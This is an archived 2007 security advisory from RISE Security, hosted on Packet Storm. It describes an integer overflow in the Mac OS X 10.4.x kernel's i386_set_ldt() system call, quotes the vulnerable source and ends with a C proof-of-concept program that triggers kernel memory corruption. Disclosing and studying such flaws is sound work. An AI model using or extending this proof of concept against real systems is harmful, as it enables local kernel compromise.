exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

RISE-2007004.txt

RISE-2007004.txt
Posted Nov 16, 2007
Authored by Ramon de C Valle, Adriano Lima | Site risesecurity.org

There exists a vulnerability within an architecture dependent function of the Apple Mac OS X 10.4.x kernel, which when properly exploited can lead to local compromise of the vulnerable system. Proof of concept code included.

tags | exploit, kernel, local, proof of concept
systems | apple, osx
SHA-256 | a2f42affdf7e92cfb45ee12031a066c7505e5f3fb2f05c870d00879bbf8cb294

RISE-2007004.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Apple Mac OS X 10.4.x Kernel i386_set_ldt() Integer Overflow Vulnerability

http://risesecurity.org/advisory/RISE-2007004/
Published: November 16, 2007
Updated: November 16, 2007

INTRODUCTION

There exists a vulnerability within an architecture dependent function
of the
Apple Mac OS X 10.4.x kernel, which when properly exploited can lead to
local
compromise of the vulnerable system.
This vulnerability was confirmed by us in the following versions of the
Apple
operating system, other versions may be also affected.

Apple Mac OS X 10.4.10
Apple Mac OS X 10.4.9
Apple Mac OS X 10.4.8
Apple Mac OS X Server 10.4.10
Apple Mac OS X Server 10.4.9
Apple Mac OS X Server 10.4.8

DETAILS

The i386_set_ldt() system call will set a list of i386 descriptors for the
current process in its LDT. It accepts a starting selector number
start_sel, an
array of memory that will contain the descriptors to be set descs, and the
number of entries to set num_sels.

int
i386_set_ldt(
int *retval,
uint32_t start_sel,
uint32_t descs, /* out */
uint32_t num_sels)
{
user_ldt_t new_ldt, old_ldt;
struct real_descriptor *dp;
unsigned int i;
unsigned int min_selector = LDTSZ_MIN; /* do not allow the
system selectors to be changed */
task_t task = current_task();
unsigned int ldt_count;
kern_return_t err;

The vulnerable function does not validate the number of entries to set
num_sels
properly. When setting a valid integer value as starting selector number
start_sel, and a integer value higher than 0xffffffff - start_sel as
number of
entries to set num_sels, it results in a integer overflow in start_sel +
num_sels expression, with its value being lower than LDTSZ.

if (start_sel != LDT_AUTO_ALLOC
&& (start_sel != 0 || num_sels != 0)
&& (start_sel < min_selector || start_sel >= LDTSZ))
return EINVAL;
if (start_sel != LDT_AUTO_ALLOC
&& start_sel + num_sels > LDTSZ)
return EINVAL;

A new LDT is allocated using the kalloc() function, with its size
argument being
sizeof(struct user_ldt) + (ldt_count * sizeof(struct real_descriptor)).

/*
* Allocate new LDT
*/

unsigned int begin_sel = start_sel;
unsigned int end_sel = begin_sel + num_sels;

if (old_ldt != NULL) {
if (old_ldt->start < begin_sel)
begin_sel = old_ldt->start;
if (old_ldt->start + old_ldt->count > end_sel)
end_sel = old_ldt->start + old_ldt->count;
}

ldt_count = end_sel - begin_sel;

new_ldt = (user_ldt_t)kalloc(sizeof(struct user_ldt) + (ldt_count *
sizeof(struct real_descriptor)));
if (new_ldt == NULL) {
task_unlock(task);
return ENOMEM;
}

new_ldt->start = begin_sel;
new_ldt->count = ldt_count;

When installing the new descriptors, the contents of memory pointed to
by descs
are copied into the new allocated LDT using the copyin() function, with
its size
argument being num_sels * sizeof(struct real_descriptor). This operation
results
in a buffer overflow in the new allocated LDT.

/*
* Install new descriptors.
*/
if (descs != 0) {
err = copyin(descs, (char *)&new_ldt->ldt[start_sel - begin_sel]
,
num_sels * sizeof(struct real_descriptor));
if (err != 0)
{
task_unlock(task);
user_ldt_free(new_ldt);
return err;
}

A proof of concept code that triggers this vulnerability can be found in
appendix section of this document.

VENDOR

Apple corrected this vulnerability in Apple Mac OS X 10.4.11. More
information
is available at http://docs.info.apple.com/article.html?artnum=307041


CREDITS

This vulnerability was discovered by Adriano Lima
<adriano@risesecurity.org> and
Ramon de Carvalho Valle <ramon@risesecurity.org>.

DISCLAIMER

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any
information
provided, including any kind of information which is incomplete or
incorrect,
will therefore be rejected.

APPENDIX

osx-x86-ldt.c

#include <stdio.h>
#include <stdlib.h>
#include <architecture/i386/table.h>
#include <i386/user_ldt.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/mman.h>

int
main(void)
{
union ldt_entry descs;
char *buf;
u_long pgsz = sysconf(_SC_PAGESIZE);

if ((buf = (char *)malloc(pgsz * 4)) == -1) {
perror("malloc");
exit(EXIT_FAILURE);
}

memset(buf, 0x41, pgsz * 4);

buf = (char *)(((u_long)buf & ~pgsz) + pgsz);

if (mprotect((char *)((u_long)buf + (pgsz * 2)), (size_t)pgsz,
PROT_WRITE) == -1) {
perror("mprotect");
exit(EXIT_FAILURE);
}

/*
* This will result in kalloc() size argument being 0x00000000 and
copyin()
* size argument being 0xfffffff8.
*/

if (i386_set_ldt(1024, (union ldt_entry *)&buf, -1) == -1) {
perror("i386_set_ldt");
exit(EXIT_FAILURE);
}

exit(EXIT_SUCCESS);
}


$Id: RISE-2007004.txt 13 2007-11-16 02:58:56Z ramon $


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFHPQixhFjK78TGSUERAmJ5AKC+nbz0KiGcg0ZejSU28bOdpy1vZwCgng+j
s3+jqsz8JohpM474nNeJc0A=
=DvfH
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close